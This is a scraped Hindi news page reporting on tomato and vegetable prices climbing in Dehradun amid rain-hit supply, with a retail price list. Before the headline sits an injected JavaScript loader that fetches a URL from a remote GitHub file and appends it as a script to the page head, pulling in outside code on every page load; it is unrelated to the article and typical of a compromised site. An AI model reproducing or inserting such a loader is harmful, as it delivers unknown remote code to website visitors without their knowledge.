;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); महंगे दामों से राहत देने के लिए जिला प्रशासन का अभियान भी पढ़ा सुस्त, शहर में फिर बढ़े टमाटर के दाम – Khabar India 24×7
ख़बर उत्तराखंड

महंगे दामों से राहत देने के लिए जिला प्रशासन का अभियान भी पढ़ा सुस्त, शहर में फिर बढ़े टमाटर के दाम

देहरादून। शहर में टमाटर के दाम फिर बढ़ गए हैं। फुटकर में टमाटर 150 से 160 रुपये प्रति किलो में मिल रहा है। अन्य सब्जियों के दामों में भी लगातार उछाल देखने को मिल रहा है। वहीं, लोगों को महंगे दामों से राहत देने के लिए जिला प्रशासन का अभियान भी अब सुस्त पड़ गया है। दरअसल, बारिश का क्रम रुकने का नाम नहीं ले रहा है। फसल खराब होने और रास्ते बंद होने के कारण मंडी में टमाटर की आवक घट गई है। पूरे देश में टमाटर की कमी के कारण बाहर से भी टमाटर दून मंडी में नहीं पहुंच पा रहा है।

इससे एक बार फिर से टमाटर के दाम आसमान छूने लगे हैं। वहीं, अन्य सब्जियों के दामों में भी लगातार उछाल आने से लोगों को राहत नहीं मिल पा रही है। जिला प्रशासन की ओर से दुकानों पर लगाई गई मूल्य सूची भी गायब हो गई है। सचिव मंडी विजय थपलियाल ने बताया कि बारिश के कारण पहाड़ों से पर्याप्त मात्रा में टमाटर और सब्जियां नहीं पहुंच पा रही हैं। इसका असर दामों पर पड़ रहा है।

फुटकर में सब्जियों के दाम

सब्जी, दाम प्रति किलो

टमाटर, 150 से 160 रुपये

तोरई, 20 से 30 रुपये

भिंडी, 30 से 40 रुपये

अदरक, 280 रुपये

करेला, 50 से 60 रुपये

बैंगन, 60 रुपये

लौकी, 25 से 40 रुपये

Leave a Reply

Your email address will not be published. Required fields are marked *